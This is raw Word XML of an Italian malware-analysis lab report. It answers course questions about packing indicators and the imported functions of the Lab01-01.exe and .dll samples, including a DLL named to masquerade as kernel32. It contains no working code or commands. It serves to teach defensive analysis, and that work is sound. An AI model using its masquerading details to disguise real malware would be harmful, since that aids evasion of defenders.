                      <a:hlinkClick r:id="rId146"/>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50209" r="72590" b="30540"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2250000" cy="1051200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407ABCD" w14:textId="4D5EEF0B" w:rsidR="00E74964" w:rsidRDefault="00E74964" w:rsidP="00E74964">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="0048406D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ci sono indicazioni che uno di questi file sia impacchettato o offuscato? Se sì, quali sono questi indicatori?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B3990" w14:textId="31F8C160" w:rsidR="00E8389A" w:rsidRDefault="00EE6001" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Dall’analisi delle stringhe risultano molte stringhe incomprensibili</w:t>
      </w:r>
      <w:r w:rsidR="00D876B5">
        <w:t xml:space="preserve"> che potrebbero indicare che sia offuscato</w:t>
      </w:r>
      <w:r w:rsidR="00F405B0">
        <w:t>. L’entropi</w:t>
      </w:r>
      <w:r w:rsidR="00DB0292">
        <w:t>a risulta</w:t>
      </w:r>
      <w:r w:rsidR="009438B5">
        <w:t xml:space="preserve"> però</w:t>
      </w:r>
      <w:r w:rsidR="00DB0292">
        <w:t xml:space="preserve"> bassa sia nel</w:t>
      </w:r>
      <w:r w:rsidR="00D85F32">
        <w:t>l’</w:t>
      </w:r>
      <w:r w:rsidR="00DB0292">
        <w:t xml:space="preserve"> eseguibile che nella dll. </w:t>
      </w:r>
      <w:r w:rsidR="009438B5">
        <w:t>La dimensione fisica sembra simile alla dimensione virtuale e quindi non dovrebbe essere compresso.</w:t>
      </w:r>
      <w:r w:rsidR="00F16C80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D73B25">
        <w:t xml:space="preserve">I nomi delle librerie importati sono in chiaro come anche i nomi delle funzioni. </w:t>
      </w:r>
      <w:r w:rsidR="00DD21B2">
        <w:t>Entrambi i file risultano compilati con Microsoft visual c++</w:t>
      </w:r>
      <w:r w:rsidR="001A38A8">
        <w:t xml:space="preserve"> 6.0 </w:t>
      </w:r>
      <w:r w:rsidR="00F16C80">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAF3A50" w14:textId="5C76DB10" w:rsidR="00A21BBD" w:rsidRDefault="00E8389A" w:rsidP="00E8389A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56BEEA86" wp14:editId="719EFE94">
            <wp:extent cx="2766060" cy="1634490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="482843336" name="Immagine 2"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336" name="Immagine 2" descr="Immagine che contiene testo, schermata, schermo, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId148"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2810025" cy="1660469"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BAC67D" w14:textId="1E5C6C30" w:rsidR="001344F0" w:rsidRDefault="00A21BBD" w:rsidP="00A21BBD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31B2189F" wp14:editId="54215175">
            <wp:extent cx="5190659" cy="2604654"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1793143231" name="Immagine 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3231" name="Immagine 4">
                      <a:hlinkClick r:id="rId149"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId150">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="27273" b="52008"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274833" cy="2646892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00453004" w14:textId="77777777" w:rsidR="00E022E6" w:rsidRDefault="00E022E6" w:rsidP="00A21BBD">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FC79855" wp14:editId="44FE7F23">
            <wp:extent cx="6645910" cy="1057910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15350945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458" name="Immagine 1" descr="Immagine che contiene testo, Carattere, schermata, ricevuta&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId151"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1057910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A31C3F" w14:textId="71C68602" w:rsidR="00A21BBD" w:rsidRDefault="009E28DE" w:rsidP="00A21BBD">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B13BAEE" wp14:editId="37AD3367">
            <wp:extent cx="6640830" cy="1117600"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="1908913500" name="Immagine 5">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3500" name="Immagine 5">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0830" cy="1117600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C496B39" w14:textId="77777777" w:rsidR="00F62500" w:rsidRDefault="00F62500" w:rsidP="00A21BBD">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4556C5FE" w14:textId="77777777" w:rsidR="00E74964" w:rsidRDefault="00E74964" w:rsidP="00E74964">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="0048406D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ci sono importazioni che suggeriscono cosa fa questo malware? Se sì, di quali importazioni si tratta?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C55A97" w14:textId="77777777" w:rsidR="006E00BF" w:rsidRDefault="00586C79" w:rsidP="005A0B73">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Lab01-01.exe</w:t>
      </w:r>
      <w:r w:rsidR="00AD21C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A56F3">
        <w:t>importa</w:t>
      </w:r>
      <w:r w:rsidR="006E00BF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4671F8" w14:textId="367F7D51" w:rsidR="00AD21C0" w:rsidRDefault="006E00BF" w:rsidP="005A0B73">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kernel32.dll </w:t>
      </w:r>
      <w:r w:rsidR="00A82DD4" w:rsidRPr="00A82DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidR="00A82DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A82DD4" w:rsidRPr="00A82DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>è la libreria a collegamento dinamico a 32 bit presente nel kernel del sistema operativo Windows. Gestisce la gestione della memoria, le operazioni di input/output e gli interrupt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401194E9" w14:textId="2166F31F" w:rsidR="006E00BF" w:rsidRDefault="00884C15" w:rsidP="006E00BF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00884C15">
        <w:t xml:space="preserve">CreateFileA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4BE1AF4B" wp14:editId="1B5AB30E">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="141778931" name="Immagine 3"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884C15">
        <w:t>Crea o apre un file o un dispositivo I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604475E9" w14:textId="0F08C40C" w:rsidR="00884C15" w:rsidRDefault="00884C15" w:rsidP="006E00BF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00884C15">
        <w:t xml:space="preserve">CopyFileA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5E55C2D2" wp14:editId="1B1FD08D">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="1666390971" name="Immagine 1666390971"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884C15">
        <w:t xml:space="preserve"> Copia un file esistente in un nuovo file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ABF2D7" w14:textId="77599754" w:rsidR="00A0471D" w:rsidRPr="00A0471D" w:rsidRDefault="00A0471D" w:rsidP="008D2672">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="008D2672">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateFileMappingA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430F7C35" wp14:editId="441CDF7C">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="401605710" name="Immagine 401605710"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8D2672">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Crea o apre un oggetto di mappatura file con o senza nome per un file specificato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1722AA1C" w14:textId="4CFC7A79" w:rsidR="00A0471D" w:rsidRDefault="00A0471D" w:rsidP="008D2672">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="008D2672">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">FindFirstFileA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0CF345C8" wp14:editId="6BC8CA9E">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="101265198" name="Immagine 101265198"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8D2672">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cerca in una directory un file o una sottodirectory con un nome che corrisponde a un nome specifico (oa un nome parziale se vengono utilizzati i caratteri jolly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB98F49" w14:textId="79F39B09" w:rsidR="00A0471D" w:rsidRPr="008D2672" w:rsidRDefault="00A0471D" w:rsidP="008D2672">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D2672">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">FindNextFileA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118FA182" wp14:editId="4E33A7CE">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="1982777002" name="Immagine 1982777002"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8D2672">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Continua una ricerca di file da una chiamata precedente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBAC7C7" w14:textId="052FEB93" w:rsidR="00A0471D" w:rsidRPr="008D2672" w:rsidRDefault="008D2672" w:rsidP="008D2672">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D2672">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MapViewOfFile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1A6D2977" wp14:editId="68DC8382">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="67365389" name="Immagine 67365389"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8D2672">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mappa una vista di una mappatura di file nello spazio degli indirizzi di un processo chiamante. Il malware può apportare modifiche al file effettivo una volta mappato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CAD5F7" w14:textId="24FAAF2C" w:rsidR="008D2672" w:rsidRDefault="009849A9" w:rsidP="008D2672">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009849A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">MSVCRT.dll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401EF324" wp14:editId="7E6282D7">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="2075491596" name="Immagine 2075491596"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9849A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un modulo contenente funzioni di libreria C standard come printf, memcpy e cos. Fa parte della libreria di runtime di Microsoft C. Processi non di sistema come msvcrt . dll provengono dal software installato sul sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9F39E8" w14:textId="261C3BF2" w:rsidR="009849A9" w:rsidRDefault="009849A9" w:rsidP="008D2672">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009849A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel132.dll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243478C0" wp14:editId="0C091C52">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="760313239" name="Immagine 760313239"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9849A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Versione mascherata dell'originale KERNEL32.DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58278454" w14:textId="37A61D3B" w:rsidR="009849A9" w:rsidRDefault="00A4629C" w:rsidP="008D2672">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab01-01.dll </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4629C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">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7ABC3FBD" wp14:editId="22E637AA">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="167250233" name="Immagine 167250233"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A4629C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> File DLL aggiuntivo creato per il corretto funzionamento dell'eseguibile Lab01–01.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76874614" w14:textId="77777777" w:rsidR="007243A2" w:rsidRDefault="007243A2" w:rsidP="008D2672">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688A87FE" w14:textId="726E3E5E" w:rsidR="001D2AE2" w:rsidRDefault="001D2AE2" w:rsidP="008D2672">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2AE2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Il secondo file Lab01–01.dll effettua le seguenti importazioni</w:t>
      </w:r>
      <w:r w:rsidR="007243A2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A0BDB" w14:textId="158E4C1C" w:rsidR="00A82DD4" w:rsidRPr="00A82DD4" w:rsidRDefault="00A82DD4" w:rsidP="00A82DD4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">KERNEL32.dll </w:t>
      </w:r>
      <w:r w:rsidR="00B25E3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B4249" w14:textId="6A899248" w:rsidR="00A82DD4" w:rsidRPr="00A82DD4" w:rsidRDefault="00A82DD4" w:rsidP="00A82DD4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">MSVCRT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5D55DFD2" wp14:editId="427873EC">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="1856390967" name="Immagine 1856390967"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A82DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un modulo contenente funzioni di libreria C standard come printf, memcpy e cos. Fa parte della libreria di runtime di Microsoft C. Processi non di sistema come msvcrt.dll provengono dal software installato sul sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F1748" w14:textId="2C8BD3A3" w:rsidR="00AD21C0" w:rsidRPr="00C2486B" w:rsidRDefault="00A82DD4" w:rsidP="005A0B73">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">WS2_32.dll </w:t>
      </w:r>
      <w:r w:rsidR="00756BEB">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00756BEB">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://static.vecteezy.com/system/resources/previews/009/351/258/non_2x/arrow-icon-arrows-sign-black-arrows-free-png.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00756BEB">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00756BEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26C07095" wp14:editId="3FABDA4C">
            <wp:extent cx="160020" cy="112044"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
